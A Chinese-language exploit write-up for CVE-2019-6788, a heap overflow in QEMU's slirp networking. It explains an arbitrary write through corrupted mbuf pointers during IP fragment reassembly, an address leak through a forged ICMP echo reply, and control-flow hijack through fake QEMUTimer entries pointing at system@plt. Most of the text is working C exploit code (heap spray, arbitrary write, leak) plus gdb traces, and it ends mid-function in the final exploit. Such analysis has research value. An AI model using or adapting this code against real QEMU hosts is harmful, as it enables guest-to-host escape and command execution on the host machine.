上面，提出了malloc原语的用法。再结合之前堆溢出利用的常见思路，即可以先实现任意地址写。而首先任意地址写需要先找到一个含有写指针的结构体。这里选择的结构体，是我们在前面就已经提及的mbuf：

struct mbuf {
	/* XXX should union some of these! */
	/* header at beginning of each mbuf: */
	struct	mbuf *m_next;		/* Linked list of mbufs */
	struct	mbuf *m_prev;
	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
	int	m_flags;		/* Misc flags */

	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
	struct	socket *m_so;

	caddr_t	m_data;			/* Current location of data */  //当前的数据指针
	int	m_len;			/* Amount of data in this mbuf, from m_data */

	Slirp *slirp;
	bool	resolution_requested;
	uint64_t expiration_date;
	char   *m_ext;
	/* start of dynamic buffer area, must be last element */
	char    m_dat[];
};

在mbuf中，可以看到有数据指针m_data以及长度m_len，符合要求。然后我们再去寻找一处能够对该指针进行写入的路径。如果能稳定控制该路径，那么我们通过堆溢出修改该结构体指针就有可能实现任意写。

这里对m_data写入的路径其实有很多，这里原作者选择的路径是前面提到ip在接受到最后一个分片数据包时会调用m_cat对所有分片数据包进行整合：

/*
 * Copy data from one mbuf to the end of
 * the other.. if result is too big for one mbuf, allocate
 * an M_EXT data segment
 */
void m_cat(struct mbuf *m, struct mbuf *n)
{
	/*
	 * If there's no room, realloc
	 */
	if (M_FREEROOM(m) < n->m_len)
		m_inc(m, m->m_len + n->m_len);

	memcpy(m->m_data+m->m_len, n->m_data, n->m_len);
	m->m_len += n->m_len;

	m_free(n);
}

/* make m 'size' bytes large from m_data */
void m_inc(struct mbuf *m, int size)
{
    int gapsize;

    /* some compilers throw up on gotos.  This one we can fake. */
    if (M_ROOM(m) > size) {
        return;
    }

    if (m->m_flags & M_EXT) {
        gapsize = m->m_data - m->m_ext;
        m->m_ext = g_realloc(m->m_ext, size + gapsize);
    } else {
        gapsize = m->m_data - m->m_dat;
        m->m_ext = g_malloc(size + gapsize);
        memcpy(m->m_ext, m->m_dat, m->m_size);
        m->m_flags |= M_EXT;
    }

    m->m_data = m->m_ext + gapsize;
    m->m_size = size + gapsize;
}

在m_cat中实现了将所有分片数据包整合到一个堆块的功能：

1、首先调用m_inc检查当前m的缓冲区是否能够存储n消息，如果不能则会调用 g_realloc或者g_malloc增大当前m的缓冲区大小；

2、如果大小满足，则会调用memcpy(m->m_data+m->m_len, n->m_data, n->m_len)，将当前n->m_data的数据拷贝到m->m_data+m->m_len处。

这里的m和n都是m_buf结构体。如果我们可以通过堆溢出覆盖m->m_data、m->m_len和n->m_data，那么就能够向任意地址写入任意值。这里的m是分片链表的头节点，n是其中的分片数据包。

接下来，我们将堆溢出与这个任意地址写整合一下，梳理一下任意地址写真正的执行流程：

1、先利用提到的malloc原语，堆喷到能分配top chunk；

2、然后重新建立一个新的socket连接，此时会重新分配一个socket对象，也即会重新分配一个可能触发堆溢出的so_rcv堆块结构；

3、随后，发送一个DF=0&MF=1的IP分片包，此时会从top chunk中分配一个m_buf存储该堆块m1，且该堆块在so_rcv之下；

4、然后，使用同一个socket向113端口发送一个EMU_IDENT协议数据包，此时就会进入堆溢出流程，使用堆溢出修改m1->m_data；

4、然后，发送一个DF=0&MF=0的IP分片包，会分配一个新的m_buf结构体m2，那么就会进入堆合并的流程。会从m2->m_data处拷贝数据到m1->m_data处，实现任意地址写。

泄漏地址

网络协议的洞想要泄漏地址，那么肯定需要找到一个能够发送返回包的路径，并且在返回数据中夹带我们需要的脏数据来实现地址泄漏。

这里原作者选择的是icmp返回包，原因其实很简单就是icmp包与tcp协议独立，且处理逻辑相对简单。

/*
 * Process a received ICMP message.
 */
void
icmp_input(struct mbuf *m, int hlen)
{
  register struct icmp *icp;
  register struct ip *ip=mtod(m, struct ip *);
  int icmplen=ip->ip_len;
  Slirp *slirp = m->slirp;

  DEBUG_CALL("icmp_input");
  DEBUG_ARG("m = %p", m);
  DEBUG_ARG("m_len = %d", m->m_len);

  /*
   * Locate icmp structure in mbuf, and check
   * that its not corrupted and of at least minimum length.
   */
  if (icmplen < ICMP_MINLEN) {          /* min 8 bytes payload */
  freeit:
    m_free(m);
    goto end_error;
  }

  m->m_len -= hlen;
  m->m_data += hlen;
  icp = mtod(m, struct icmp *);		//获取icmp协议数据包
  if (cksum(m, icmplen)) {			//检查校验值
    goto freeit;
  }
  m->m_len += hlen;
  m->m_data -= hlen;

  DEBUG_ARG("icmp_type = %d", icp->icmp_type);
  switch (icp->icmp_type) {
  case ICMP_ECHO:										//icmp echo类型
    ip->ip_len += hlen;	             /* since ip_input subtracts this */
    if (ip->ip_dst.s_addr == slirp->vhost_addr.s_addr ||
        ip->ip_dst.s_addr == slirp->vnameserver_addr.s_addr) {
        icmp_reflect(m);						//调用icmp_reflect返回数据包，参数为m，类型为m_buf结构体
    } else if (slirp->restricted) {
        goto freeit;
    } else {
      struct socket *so;
      struct sockaddr_storage addr;
      so = socreate(slirp);
      if (icmp_send(so, m, hlen) == 0) {
        return;
      }
			...

  default:
    m_free(m);
  } /* swith */

end_error:
  /* m is m_free()'d xor put in a socket xor or given to ip_send */
  return;
}

从icmp_input函数中可以看到，在处理icmp echo数据包时，会直接调用icmp_reflect返回数据包，而返回的数据包文为之前ip_input传入的消息结构体m。所以如果能够将m->m_data数据指针指向一个伪造的icmp返回数据，那么就能在返回时泄漏我们伪造地址的相关数据了。

劫持控制流

劫持控制流的方法这里还是使用QemuTimer，在bss有个全局变量main_loop_tlg，类型为QEMUTimerList，其成员active_timers为QEMUTimer*类型，我们在堆上伪造这两个变量，覆写bss的全局变量，伪造cb为system@plt，opaque为参数地址，当expire_time过完就会触发命令执行。

.bss:00000000012C3900 main_loop_tlg   QEMUTimerListGroup_0 <?>
.bss:00000000012C3900                                         ; DATA XREF: qemu_clock_init+28↑o
.bss:00000000012C3900                                         ; qemu_clock_init+C0↑o ...
.bss:00000000012C3920 ; QEMUClock_0 qemu_clocks[4]
.bss:00000000012C3920 qemu_clocks     QEMUClock_0 4 dup(<?>)  ; DATA XREF: qemu_clock_ptr+11↑o
.bss:00000000012C39A0 ; AioContext_0 *qemu_aio_context

// util/qemu-timer.c
struct QEMUTimerList {
    QEMUClock *clock;
    QemuMutex active_timers_lock;
    QEMUTimer *active_timers;
    QLIST_ENTRY(QEMUTimerList) list;
    QEMUTimerListNotifyCB *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    QemuEvent timers_done_ev;
};

// include/qemu/timer.h
struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;  // 函数指针
    void *opaque;     // 参数
    QEMUTimer *next;
    int attributes;
    int scale;
};

漏洞调试

上面已经讲述了漏洞利用的相关方法，这里对漏洞关键点进行调试分析。

任意地址写

   0x55be99d790ff <tcp_emu+176>    mov    rcx, qword ptr [rax + 0x30]                   
   0x55be99d79103 <tcp_emu+180>    mov    rax, qword ptr [rbp - 0x138]                  
   0x55be99d7910a <tcp_emu+187>    mov    rax, qword ptr [rax + 8]                      
   0x55be99d7910e <tcp_emu+191>    mov    rsi, rcx                                      
   0x55be99d79111 <tcp_emu+194>    mov    rdi, rax                                      
 ► 0x55be99d79114 <tcp_emu+197>    call   memcpy@plt                <memcpy@plt>        
        dest: 0x7ff9847c5a00 ◂— 0x0                                                     
        src: 0x7ff9847c67a4 ◂— 0x0                                                      
        n: 0x43                                                                         
                                                                                        
   0x55be99d79119 <tcp_emu+202>    mov    rax, qword ptr [rbp - 0x138]                  
   0x55be99d79120 <tcp_emu+209>    mov    rdx, qword ptr [rax + 8]                      
   0x55be99d79124 <tcp_emu+213>    mov    rax, qword ptr [rbp - 0x190]                  
   0x55be99d7912b <tcp_emu+220>    mov    eax, dword ptr [rax + 0x38]                   
   0x55be99d7912e <tcp_emu+223>    cdqe                                                 
───────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────
In file: /home/alex/qemu/cve-2019-6788/qemu/slirp/tcp_subr.c                            
   633                  struct socket *tmpso;                                           
   634                  struct sockaddr_in addr;                                        
   635                  socklen_t addrlen = sizeof(struct sockaddr_in);                 
   636                  struct sbuf *so_rcv = &so->so_rcv;                              
   637                                                                                  
 ► 638                  memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);                   
   639                  so_rcv->sb_wptr += m->m_len;                                    
   640                  so_rcv->sb_rptr += m->m_len;
   641                  m->m_data[m->m_len] = 0; /* NULL terminate */
   642                  if (strchr(m->m_data, '\r') || strchr(m->m_data, '\n')) {
   643                          if (sscanf(so_rcv->sb_data, "%u%*[ ,]%u", &n1, &n2) == 2
) {

gdb-peda$ p/a *(struct mbuf*)0x7ff9847c5a10  
$2 = {
  m_next = 0x7ff9847c3160,
  m_prev = 0x7ff9847c6080,
  m_nextpkt = 0x0,
  m_prevpkt = 0x0,
  m_flags = 0xc,
  m_size = 0x608,
  m_so = 0x0,
  m_data = 0x7ff9847c5ab0,
  m_len = 0x307,
  slirp = 0x55be9ba9ed60,
  resolution_requested = 0x0,
  expiration_date = 0xffffffffffffffff,
  m_ext = 0x0,
  m_dat = 0x7ff9847c5a70
}
gdb-peda$ p/a *(struct mbuf*)0x7ff9847c5a10
$3 = {
  m_next = 0x0,
  m_prev = 0x0,
  m_nextpkt = 0x0,
  m_prevpkt = 0x0,
  m_flags = 0x0,
  m_size = 0x608,
  m_so = 0x0,
  m_data = 0x7ff984000b00,	//fake_icmp_response_data
  m_len = 0x307,
  slirp = 0x55be9ba9ed60,
  resolution_requested = 0x0,
  expiration_date = 0xffffffffffffffff,
  m_ext = 0x0,
  m_dat = 0x7ff9847c5a70
}

可以看到通过堆溢出将m_data修改为指定地址。

ping recv:                                                                
  0000  52 55 0a 00 02 02 52 54 00 12 34 56 08 00 45 00  RU....RT..4V..E. 
  0010  00 28 de ad 00 63 ff 01 de c1 7f 00 00 01 7f 00  .(...c.......... 
  0020  00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  0030  00 00 00 00 00 00                                ......           
leak:339(): recv count 1                                                  
leak:355(): 167.205 ms (846 bytes received)                               
ping recv:                                                                
  0000  52 54 00 12 34 56 52 55 0a 00 02 02 08 00 45 00  RT..4VRU......E. 
  0010  00 1c 00 1b 00 00 ff 01 a3 b5 0a 00 02 02 0a 00  ................ 
  0020  02 0f 00 00 fc 17 03 e8 00 00 2f 75 73 72 2f 62  ........../usr/b 
  0030  69 6e 2f 78 63 61 6c 63 00 00 00 00 00 00 00 00  in/xcalc........ 
  0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  0050  00 6d f3 ca ec e3 b4 0f 80 3c 42 fa 5e 55 00 00  .m.......<B.^U.. 
  0060  00 00 00 00 00 00 00 00 00 00 e0 fe 00 00 00 00  ................ 
  0070  00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00  ................ 
  0080  00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00  ................ 
  0090  00 6d f3 ca ec e3 b4 0f 00 00 00 00 00 00 00 00  .m.............. 
  00a0  45 01 00 00 00 00 00 00 68 37 90 f9 5e 55 00 00  E.......h7..^U.. 
  00b0  00 71 1f 60 ba 7f 00 00 00 00 00 00 00 00 00 00  .q.`............ 
  00c0  90 da 1f 60 ba 7f 00 00 00 00 00 00 00 00 00 00  ...`............ 
  00d0  50 68 47 fa 5e 55 00 00 00 00 00 00 00 00 00 00  PhG.^U.......... 
  00e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  00f0  00 0f 00 60 ba 7f 00 00 00 00 00 00 00 00 00 00  ...`............ 
  0100  00 20 bd d8 b9 7f 00 00 00 10 10 00 00 00 00 00  . .............. 
  0110  f0 2f cd d8 b9 7f 00 00 0d 21 f6 ab 14 5e b8 89  ./.......!...^.. 
  0120  ae 18 2c 4d fd 7f 00 00 af 18 2c 4d fd 7f 00 00  ..,M......,M.... 
  0130  70 19 2c 4d fd 7f 00 00 00 5c 0b 6b ba 7f 00 00  p.,M.....\.k.... 
  0140  0d 21 b6 aa 14 5e b8 89 0d 21 32 b4 b3 1c 76 dc  .!...^...!2...v.

在返回报文中可以明显看到heap和text地址

EXP

堆喷

堆喷的方法其实就是不断利用上面提到的malloc原语来不断分配堆块。难点就是在于组装IP和TCP协议报文头。这里需要将IP的分片标志位置为1。

void spray_chunk(int size, uint16_t ip_id){
    int sock;
    uint8_t *packet;
    char* interface1, *src_ip, *dst_ip;
    struct ifreq ifr;
    struct ip iphdr;
    int * ip_flags, *tcp_flags;
    char* payload;
    int payloadlen;
    int status;
    struct tcphdr tcphdr;
    int i = 0;
    struct sockaddr_in sin;
    const int on = 1;

    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);
    payload = alloc_char(IP_MAXPACKET);

    payloadlen = size - 84;

    //Interface to send packet through
 		//拷贝网卡名称
    strcpy(interface1, interface);

    //Submit request for a socket descriptor to look up interface
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0){
        Err("socket() failed to get sock descriptor for using ioctl()");
        exit(EXIT_FAILURE);
    }

    //use ioctl() to look up interface index which we will use to 
    //bind socket descriptor sd to specified interface with setsockopt() since
    //none of the other arguments of sendto() specify which interface to use
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    //printf("sock iotcl begin\n");
    if(ioctl(sock, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl() failed to find interface");
        exit(EXIT_FAILURE);
    }
    close(sock);
    
    //source IPV4 address: you need to fill this out
    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //IPV4 header
    //IPv4 header length (4 bits): Number of 32-bit words in header = 5
    iphdr.ip_hl = IP4_HDRLEN /sizeof(uint32_t);
    //Internet Protocol version (4 bits): IPv4
    iphdr.ip_v = 4;
    //Type of service (8 bits)
    iphdr.ip_tos = 0;
    //Total length of datagram (16 bits): IP header + TCP header + TCP data
    iphdr.ip_len = htons(IP4_HDRLEN + TCP_HDRLEN + payloadlen);
    //ID sequence number (16 bits): unused, since single datagram
    iphdr.ip_id = htons(ip_id);
    //Flags, and Fragmentation offset (3, 13 bits): 0 since single datagram
    // Zero (1 bit)
    ip_flags[0] = 0;
    //Do not fragment flag (1 bit)
    //选择需要分片
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = 1;		//置1
    // Fragmentation offset (13 bit)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0] << 15) + (ip_flags[1] << 14) +
                    (ip_flags[2] << 13) + ip_flags[3]);
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 225;
    //Transport layer protocol (8 bits): 6 for TCP
    iphdr.ip_p = IPPROTO_TCP;		//TCP协议

    //source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set to 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //TCP header
    //Source port number (16 bits)
    tcphdr.th_sport = htons(60);
    //Destination port number (16 bits)
    tcphdr.th_dport = htons(80);
    //Sequence number (32 bits)
    tcphdr.th_seq = htonl(0);
    //Acknowledgement number (32 bits)
    tcphdr.th_ack = htonl(0);
    //Reserved (4 bits): should be 0
    tcphdr.th_x2 = 0;
    //Data offset (4 bits): size of TCP header in 32-bit words
    tcphdr.th_off = TCP_HDRLEN / 4;

    //Flags (8 bits)
    //FIN flag (1 bit)
    tcp_flags[0] = 0;
    //SYN flag (1 bit)
    tcp_flags[1] = 0;
    //RST flag (1 bit)
    tcp_flags[2] = 0;
    //PSH flag (1 bit)
    tcp_flags[3] = 1;
    //ACK flag (1 bit)
    tcp_flags[4] = 1;
    // URG flag (1 bit)
    tcp_flags[5] = 0;
    //ECE flag (1 bit)
    tcp_flags[6] = 0;
    //CWR flag (1 bit)
    tcp_flags[7] = 0;
    tcphdr.th_flags = 0;
    for(i=0; i<8; i++){
        tcphdr.th_flags += (tcp_flags[i] << i);
    }

    //window size (16 bits)
    tcphdr.th_win = htons(65535);
    //Urgent pointer (16 bits): 0 (only valid of URG flag is set)
    tcphdr.th_urp = htons(0);
    //TCP checksum (16 bits)
    tcphdr.th_sum = tcp4_checksum(iphdr, tcphdr, (uint8_t *)payload, payloadlen);

    //prepare packet
    //First part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //Next part of packet is upper layer protocol header
    memcpy((packet+IP4_HDRLEN), &tcphdr, TCP_HDRLEN*sizeof(uint8_t));
    //Last part is upper layer protocol data
    memcpy((packet+IP4_HDRLEN+TCP_HDRLEN), payload, payloadlen*sizeof(uint8_t));

    //The kernel os going to prepare layer 2 information (ethernet frame header) for us
    //For that, we need to specify a destination for the kernel in order for it to decide
    //where to send the raw datagram. we fill in a struct in_addr with the desired destination IP address
    //and pass this structure to the sendto() function
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //submit request for a raw socket descriptor
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
        exit(EXIT_FAILURE);
    }

    //ser flag so socket expects us to provide IPv4 header
    if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) <0){
        Err("setsockopt() failed to set IP_HDRINCL");
        exit(EXIT_FAILURE);
    }

    //Bind socket to interface index
    if(setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) <0){
        Err("setsockopt() failed to bind to interface");
        exit(EXIT_FAILURE);
    }

    //send packet
    if(sendto(sock, packet, IP4_HDRLEN+TCP_HDRLEN+payloadlen, 0, 
                (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto() failed");
        exit(EXIT_FAILURE);
    }

    //closed socket descriptor
    close(sock);
    //Free allocated memory
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
    free(payload);
}

任意地址写

先通过堆喷保证后续的堆布局是紧邻的。然后创建一个socket连接s，在connect时即会创建socket结构体，也就是会分配so->so_rcv缓冲区。然后紧接着发送一个ICMP的分片协议数据包，此时会为该包数据分配一个mbuf结构体mbuf1，其会紧邻在so->so_rcv之后。然后通过write(s)，不断堆溢出，修改mbuf1->m_data为target_addr。最后发送一个ICMP包并结束分片，此时会进行分片重组，则会执行memcpy(target_addr, data, data_len)，实现任意地址写。

void arbitray_write(uint64_t addr, int addr_len, uint8_t* write_data,
                    int write_data_len, int spray_times){
    int s, len, i;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t*)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t*)payload;
    uint64_t *payload64 = (uint64_t*)payload;

    memset(payload, "a", 0x1000);
    memcpy(payload, "A1ex", 4);

    printf("[+] spray chunk \n");
    for(i=0; i<spray_times; i++){
        printf("spray 0x2000 chunk, id: %d\n", i);
        spray_chunk(0x2000, spray_ip_id+i);
    }
    printf("spray finished\n");

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);  //Id pro
    len = sizeof(struct sockaddr_in);
    printf("connect so_srv malloc\n");
    //分配so_rcv堆块结构体
    ret = connect(s, (struct sockaddr*)&ip_addr, len);  //so_srv malloc
    if(ret == -1){
        Err("connect in arbitray_write");
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_p = 0xff;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;		//分片标志位为1
    printf("malloc mbuf 1\n");
    //发送一个icmp分片包，分配mbuf，紧邻so_rcv
    send_ip_pkt(&pkt_info, payload, 0x300+4);
    printf("[+] Now we finished the malloc of so_rcv and the mbuf\n");

    //堆溢出
    for(i=0; i<6; ++i){
        write(s, payload, 0x500);   

        //usleep()
        printf("send %d complete\n", i+1);
    }
    write(s, payload, 1072);
    //actual overflow here
    *payload64++ = 0;
    *payload64++ = 0x675;   // chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;   // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr>> (i*8)) & 0xff; //m_data
    }
    //修改m_data为target_addr
    write(s, payload_start, (uint8_t *)payload - payload_start);

    printf("[+]Now we have written faked mbuf struct\n");
    if(stop_flag){
        puts("trigger!");
        getchar();
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;   //分片标志位为0
    pkt_info.ip_p = 0xff;
    //发送icmp最后的分片包，随后进行分片重组
    send_ip_pkt(&pkt_info, write_data, write_data_len);
    printf("[+]Now we have trigger the written to target addr\n");

    close(s);
    free(payload_start);
    return 0;
}

泄漏地址

首先利用任意地址写，将m_data的低位改写为0x0b00，然后在其写入伪造的icmp包数据。随后创建一个rcv_socket接受icmp的返回数据。此时在多余的脏数据中就可以得到heap地址和qemu地址，但是这里的qemu地址的第4位和第5位不固定，也导致了exp不一定完全成功。

void leak(uint64_t addr, int addr_len) {
    int s, len, i, recvsd;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t *)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t *)payload;
    uint64_t *payload64 = (uint64_t *)payload;

    memset(payload, 'A', 0x1000);
    memcpy(payload, "ama2in9", 7);

    dbg_printf("in leak_text...\n");
    for (i = 0; i < 0x20; ++i) {
        dbg_printf("spraying size 0x2000, id: %d\n", i);
        spray(0x2000, g_spray_ip_id + i);
    }
    dbg_printf("spray finished.\n");
    // getchar();

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113); // vulnerable port
    len = sizeof(struct sockaddr_in);
    ret = connect(s, (struct sockaddr *)&ip_addr, len);
    if (ret == -1) {
        perror("0ops: client");
        exit(1);
    }

    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;
    pkt_info.ip_p = IPPROTO_ICMP;
    send_ip_pkt(&pkt_info, payload, 0x300 + 4); // 这个packet就在so_rcv的后面

    /*
        let's overflow here!
        send(xxx)
    */
    for (i = 0; i < 6; ++i) {
        write(s, payload, 0x500); 
                                  
        dbg_printf("send %d complete\n", i + 1);
    }
    write(s, payload, 1072);

    // actual overflow here
    *payload64++ = 0;
    *payload64++ = 0x675; // chunk header
    *payload64++ = 0;     // m_next
    *payload64++ = 0;     // m_prev
    *payload64++ = 0;     // m_nextpkt
    *payload64++ = 0;     // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;     // m_flags
    *payload32++ = 0x608; // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0; // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for (i = 0; i < addr_len; ++i) {
        *payload++ = (addr >> (i * 8)) & 0xff; // m_data
    }
    //修改m_data低位为0xb00
    write(s, payload_start, (uint8_t *)payload - payload_start);
    printf("[+]leaking: Now we have finished faking m_data.\n");
    //getchar();
    // write(s, payload, 0x1000);
    dbg_printf("trigger reass!");
    // getchar();
    memset(payload, 'A', 0x1000);
    memcpy(payload, "a1exxx", 6);
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;
    pkt_info.ip_p = IPPROTO_ICMP;

    recvsd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    //在0xb00写入伪造的icmp返回报文
    send_ip_pkt(&pkt_info, payload, 0);
    printf("[+]leaking: Now we have finished writting to target.\nAlso, this means we will get the response packet we want.\n");
    //getchar();

    // we receive data here
    int bytes, status;
    struct ip *recv_iphdr;
    struct icmp *recv_icmphdr;
    uint8_t recv_ether_frame[IP_MAXPACKET];
    struct sockaddr from;
    socklen_t fromlen;
    struct timeval wait, t1, t2;
    struct timezone tz;
    double dt;

    (void)gettimeofday(&t1, &tz);
    wait.tv_sec = 2;
    wait.tv_usec = 0;
    setsockopt(recvsd, SOL_SOCKET, SO_RCVTIMEO, (char *)&wait,
               sizeof(struct timeval));
    recv_iphdr = (struct ip *)(recv_ether_frame + ETH_HDRLEN);
    recv_icmphdr = (struct icmp *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
    int count = 0;
    while (1) {
        memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
        memset(&from, 0, sizeof(from));
        fromlen = sizeof(from);
        if ((bytes = recvfrom(recvsd, recv_ether_frame, IP_MAXPACKET, 0,
                              (struct sockaddr *)&from, &fromlen)) < 0) {
            status = errno;
            if (status == EAGAIN) { // EAGAIN = 11
                dbg_printf("No reply within %li seconds.\n", wait.tv_sec);
                exit(EXIT_FAILURE);
            } else if (status == EINTR) { // EINTR = 4
                continue;
            } else {
                perror("recvfrom() failed ");
                exit(EXIT_FAILURE);
            }
        } // End of error handling conditionals.
        // hexdump("recv", recv_ether_frame, 0x50);
        dbg_printf("recv count %d\n", count++);
        if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) ==
             ETH_P_IP) &&
            (recv_iphdr->ip_p == IPPROTO_ICMP) &&
            (recv_icmphdr->icmp_type == ICMP_ECHOREPLY)) {
            // Stop timer and calculate how long it took to get a reply.
            (void)gettimeofday(&t2, &tz);
            dt = (double)(t2.tv_sec - t1.tv_sec) * 1000.0 +
                 (double)(t2.tv_usec - t1.tv_usec) / 1000.0;

            dbg_printf("%g ms (%i bytes received)\n", dt, bytes);
#ifdef DEBUG
            hexdump("ping recv", recv_ether_frame, bytes);

#endif
            if (bytes < 0x200)
                continue;
            text_base =
                ((*(uint64_t *)(recv_ether_frame + 0x88)) - 0x7e7d01) & ~0xfff;
            heap_base = (*(uint64_t *)(recv_ether_frame + 0x90)) & ~0xffffff;
            dbg_printf("leak text_base: 0x%lx\n"
                       "leak heap_base: 0x%lx\n",
                       text_base, heap_base);
            // getchar();
            break;
        } // End if IP ethernet frame carrying ICMP_ECHOREPLY
    }

    //getchar();
    close(s);
    close(recvsd);
    free(payload_start);
}

最终exp如下：

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include <net/if.h>          // struct ifreq
#include<string.h>
#include <netinet/in.h> // IPPROTO_RAW, IPPROTO_IP, IPPROTO_TCP, INET_ADDRSTRLEN
#include <netinet/ip.h> // struct ip and IP_MAXPACKET (which is 65535)
#include <netinet/ip_icmp.h> // struct icmp, ICMP_ECHO
#include<netinet/tcp.h>
#include<net/ethernet.h>
#include<linux/if_ether.h>
#include<linux/if_packet.h>
#include<sys/ioctl.h>
#include<bits/ioctls.h>
#include<sys/time.h>
#include <errno.h>
#include<net/ethernet.h>
#include<netinet/tcp.h>
#include<stdbool.h>
#include<assert.h>
// Define some constants.
#define ETH_HDRLEN 14 // Ethernet header length
#define IP4_HDRLEN 20 // IPv4 header length
#define TCP_HDRLEN 20 // TCP header length, excludes options data
#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data

char interface[] = "enp0s3";
char host[] = "10.0.2.2";
uint64_t text_base, heap_base;
int stop_flag;
int spray_ip_id = 0x0;
typedef void *Slirp;
struct mbuf {
    /* XXX should union some of these! */
    /* header at beginning of each mbuf: */
    struct mbuf *m_next; /* Linked list of mbufs */
    struct mbuf *m_prev;
    struct mbuf *m_nextpkt; /* Next packet in queue/record */
    struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
    int m_flags;            /* Misc flags */
    int m_size;             /* Size of mbuf, from m_dat or m_ext */
    struct socket *m_so;
    caddr_t m_data; /* Current location of data */
    int m_len;      /* Amount of data in this mbuf, from m_data */
    Slirp *slirp;
    bool resolution_requested;
    uint64_t expiration_date;
    char *m_ext;
    /* start of dynamic buffer area, must be last element */
    char m_dat[];
};

// some header info to pass to the send_ip_pkt
struct ip_pkt_info {
    uint16_t ip_id;
    uint16_t ip_off;
    bool MF;
    uint8_t ip_p;
};

void Err(char* buf){
    printf("error: %s\n", buf);
    exit(-1);
}

unsigned short csum(unsigned short *buf, int nwords)
{
  unsigned long sum;
  for(sum=0; nwords>0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum &0xffff);
  sum += (sum >> 16);
  return (unsigned short)(~sum);
}

// Build IPv4 TCP pseudo-header and call checksum function.
uint16_t tcp4_checksum(struct ip iphdr, struct tcphdr tcphdr, uint8_t *payload,
                       int payloadlen) {
    uint16_t svalue;
